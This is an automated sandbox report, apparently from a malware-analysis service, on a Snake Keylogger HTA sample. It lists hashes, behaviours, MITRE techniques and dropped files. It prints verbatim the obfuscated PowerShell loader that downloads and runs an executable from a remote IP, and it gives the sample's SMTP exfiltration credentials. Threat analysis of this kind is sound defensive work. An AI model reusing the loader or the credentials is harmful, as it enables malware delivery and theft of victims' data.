snakekeylogger | bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef

Analysis

max time kernel
110s
max time network
111s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06-10-2024 18:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.hta
Size

150KB
MD5

25a0a6e379daa9cb5c68307fbf0857ea
SHA1

4c672a33a46b32584f00868c4b98d10187a91c3c
SHA256

bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef
SHA512

fb0bb7232df274cc07e30ec425e891e40cc105469e2aaf0f0d3843199c605f910a74690195a08ed1b269725ff13a48b927585d0f98a655743b0484ea8f652ee7
SSDEEP

48:7oa+ahWjz7eWLB2L64UKB3Rns4wKB3RnFWhWYYeecSr99DdokZGStBw04v4U1QYx:Ea+Cw7W3FNYfqffZUgAVT

Score

10^/10

snakekeylogger collection defense_evasion discovery execution keylogger stealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.purityontap.com
Port:
587
Username:
[email protected]
Password:
mail55
Email To:
[email protected]

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral2/memory/756-82-0x0000000000140000-0x0000000000166000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	4972	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4972	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
3844	taskhostw.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	checkip.dyndns.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00080000000234df-67.dat	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3844 set thread context of 756	3844	taskhostw.exe	88

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4972	powershell.exe
4972	powershell.exe
756	RegSvcs.exe
756	RegSvcs.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3844	taskhostw.exe
3844	taskhostw.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	756	RegSvcs.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 2468 wrote to memory of 4676	2468	mshta.exe	82
PID 2468 wrote to memory of 4676	2468	mshta.exe	82
PID 2468 wrote to memory of 4676	2468	mshta.exe	82
PID 4676 wrote to memory of 4972	4676	cmd.exe	84
PID 4676 wrote to memory of 4972	4676	cmd.exe	84
PID 4676 wrote to memory of 4972	4676	cmd.exe	84
PID 4972 wrote to memory of 1872	4972	powershell.exe	85
PID 4972 wrote to memory of 1872	4972	powershell.exe	85
PID 4972 wrote to memory of 1872	4972	powershell.exe	85
PID 1872 wrote to memory of 2252	1872	csc.exe	86
PID 1872 wrote to memory of 2252	1872	csc.exe	86
PID 1872 wrote to memory of 2252	1872	csc.exe	86
PID 4972 wrote to memory of 3844	4972	powershell.exe	87
PID 4972 wrote to memory of 3844	4972	powershell.exe	87
PID 4972 wrote to memory of 3844	4972	powershell.exe	87
PID 3844 wrote to memory of 756	3844	taskhostw.exe	88
PID 3844 wrote to memory of 756	3844	taskhostw.exe	88
PID 3844 wrote to memory of 756	3844	taskhostw.exe	88
PID 3844 wrote to memory of 756	3844	taskhostw.exe	88

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2468
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxa2jpsv\dxa2jpsv.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1872
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC014.tmp" "c:\Users\Admin\AppData\Local\Temp\dxa2jpsv\CSCE24E7D8FFAE74E56A0C529F442F14E5.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2252
  - - C:\Users\Admin\AppData\Roaming\taskhostw.exe
      "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:3844
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC014.tmp

Filesize
1KB

MD5
1c8b77e8a4fd59b53fcd9d96b46a1c43

SHA1
cd368720ff7628f1ea074d11b59dd3c5582aa305

SHA256
aa859c8fea2e4292ea498ecb753ee94ec1082c8a7ff5075872a021013b4f6d9f

SHA512
6c1138c13a919e690ab28e24b0a7d0c76bb4502c23bc0cb40d179b8175848604bd7c5b3965a19d211d0daa1117b7cf1690663d8d867342d4cd70ed31f1485bb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wdjpr3u3.0ay.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dxa2jpsv\dxa2jpsv.dll

Filesize
3KB

MD5
9756c2172a89e4f615a5c411071eb972

SHA1
0cdd42ded95f8069f5ce3c49f2a07c4624055452

SHA256
f47d8a3b57820487cbe366b61789ecdad4d2fd2c4de9b28e162d0dbd4b3181b5

SHA512
6194e32aea98be7bb9e4174cc281007e0fe1d31a0812294d3c1db94c59f1b8f1427848fef607229cbd4959a762f91e087635d42e7329b82f9dc45100937dcfff

Download Submit
C:\Users\Admin\AppData\Roaming\taskhostw.exe

Filesize
931KB

MD5
58ff14d476f2bbaab31b12587c09559e

SHA1
ea9c7ce65a67f2a2d4e1ca4a2c3ac6785021fc94

SHA256
1640e87780b219eba703c734e68b0f5cf793bc94fe0cdf9121658d12bb1f9364

SHA512
a75d4bd80620a9441783131812780397fb0c3b1c6d6b9147d65ece23d9cc9384c148f6c491794cfbc012c290e3266e06a76357b84141b843929a295c2649613a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dxa2jpsv\CSCE24E7D8FFAE74E56A0C529F442F14E5.TMP

Filesize
652B

MD5
ff79d301256ac92033457532fdb8cd85

SHA1
7f9caaa549bfe73a8db4ebc8e7a64824470f1c61

SHA256
ba620562b4a11338a01c95475e625f213d87b9a2019b20953ed6c69f3497ba99

SHA512
f33543cdaa6b28780ccdc034e86742c2d9c085b9f8df807c12040ce47b7d89f6b4c2025580ed31c3a6cdfd7787bad3f5fdd7434bc6ceaad8d204190ba3baff92

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dxa2jpsv\dxa2jpsv.0.cs

Filesize
477B

MD5
3c2b912e8118e7163d3d05a557f13d2f

SHA1
8889f87c11a2fca2b363c3064d317447a29c5498

SHA256
822f2e3e97f3d3f1d6a78969a3b8e502a2dd611a0bb9e1abccfd94f6faa22852

SHA512
7aeb33879a1c6a8a639e65e4dab9076d2c0c03bb65e2883c342d35b3ae3cbcda8dc6158da09ded5d908193af173cb4c34014b0055b13c1ed9be74fb3fe896499

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dxa2jpsv\dxa2jpsv.cmdline

Filesize
369B

MD5
17f1bd4cc7c9e4a2099e2e2916385a34

SHA1
044790895cb168d2a372e9bdc8316e0b20f845c6

SHA256
ff910a3847fb68b71ecebb92b9735c6a97de2ce470289382d413b66ef905dcac

SHA512
9de6570fa7258340cf74b9322e21cbadeebee727cfed06b28fa6f2be8d6b934f06bf653731fa5f6b31d0d2d276750cafeeae40a9cdf2469760cd53dd2bdd08c1

Download Submit
memory/756-85-0x0000000005D50000-0x0000000005F12000-memory.dmp

Filesize
1.8MB

Download
memory/756-82-0x0000000000140000-0x0000000000166000-memory.dmp

Filesize
152KB

Download
memory/756-83-0x0000000004A00000-0x0000000004A9C000-memory.dmp

Filesize
624KB

Download
memory/756-84-0x0000000005B30000-0x0000000005B80000-memory.dmp

Filesize
320KB

Download
memory/756-86-0x0000000005C20000-0x0000000005CB2000-memory.dmp

Filesize
584KB

Download
memory/756-87-0x0000000005BE0000-0x0000000005BEA000-memory.dmp

Filesize
40KB

Download
memory/4972-19-0x00000000067B0000-0x00000000067FC000-memory.dmp

Filesize
304KB

Download
memory/4972-0-0x000000007111E000-0x000000007111F000-memory.dmp

Filesize
4KB

Download
memory/4972-23-0x000000006DD20000-0x000000006E074000-memory.dmp

Filesize
3.3MB

Download
memory/4972-33-0x0000000006D20000-0x0000000006D3E000-memory.dmp

Filesize
120KB

Download
memory/4972-34-0x0000000007750000-0x00000000077F3000-memory.dmp

Filesize
652KB

Download
memory/4972-35-0x0000000071110000-0x00000000718C0000-memory.dmp

Filesize
7.7MB

Download
memory/4972-37-0x0000000007AC0000-0x0000000007ADA000-memory.dmp

Filesize
104KB

Download
memory/4972-36-0x0000000008100000-0x000000000877A000-memory.dmp

Filesize
6.5MB

Download
memory/4972-38-0x0000000007B30000-0x0000000007B3A000-memory.dmp

Filesize
40KB

Download
memory/4972-39-0x0000000007D50000-0x0000000007DE6000-memory.dmp

Filesize
600KB

Download
memory/4972-40-0x0000000007CB0000-0x0000000007CC1000-memory.dmp

Filesize
68KB

Download
memory/4972-41-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

Filesize
56KB

Download
memory/4972-42-0x0000000007CF0000-0x0000000007D04000-memory.dmp

Filesize
80KB

Download
memory/4972-43-0x0000000007D30000-0x0000000007D4A000-memory.dmp

Filesize
104KB

Download
memory/4972-44-0x0000000007D20000-0x0000000007D28000-memory.dmp

Filesize
32KB

Download
memory/4972-21-0x000000006D9D0000-0x000000006DA1C000-memory.dmp

Filesize
304KB

Download
memory/4972-22-0x0000000071110000-0x00000000718C0000-memory.dmp

Filesize
7.7MB

Download
memory/4972-20-0x0000000006D40000-0x0000000006D72000-memory.dmp

Filesize
200KB

Download
memory/4972-57-0x0000000007D20000-0x0000000007D28000-memory.dmp

Filesize
32KB

Download
memory/4972-18-0x0000000006790000-0x00000000067AE000-memory.dmp

Filesize
120KB

Download
memory/4972-17-0x0000000006190000-0x00000000064E4000-memory.dmp

Filesize
3.3MB

Download
memory/4972-63-0x000000007111E000-0x000000007111F000-memory.dmp

Filesize
4KB

Download
memory/4972-64-0x0000000071110000-0x00000000718C0000-memory.dmp

Filesize
7.7MB

Download
memory/4972-65-0x0000000007FD0000-0x0000000007FF2000-memory.dmp

Filesize
136KB

Download
memory/4972-66-0x0000000008D30000-0x00000000092D4000-memory.dmp

Filesize
5.6MB

Download
memory/4972-7-0x0000000006120000-0x0000000006186000-memory.dmp

Filesize
408KB

Download
memory/4972-79-0x0000000071110000-0x00000000718C0000-memory.dmp

Filesize
7.7MB

Download
memory/4972-6-0x00000000060B0000-0x0000000006116000-memory.dmp

Filesize
408KB

Download
memory/4972-5-0x0000000006010000-0x0000000006032000-memory.dmp

Filesize
136KB

Download
memory/4972-4-0x0000000071110000-0x00000000718C0000-memory.dmp

Filesize
7.7MB

Download
memory/4972-2-0x00000000059A0000-0x0000000005FC8000-memory.dmp

Filesize
6.2MB

Download
memory/4972-3-0x0000000071110000-0x00000000718C0000-memory.dmp

Filesize
7.7MB

Download
memory/4972-1-0x00000000051B0000-0x00000000051E6000-memory.dmp

Filesize
216KB

Download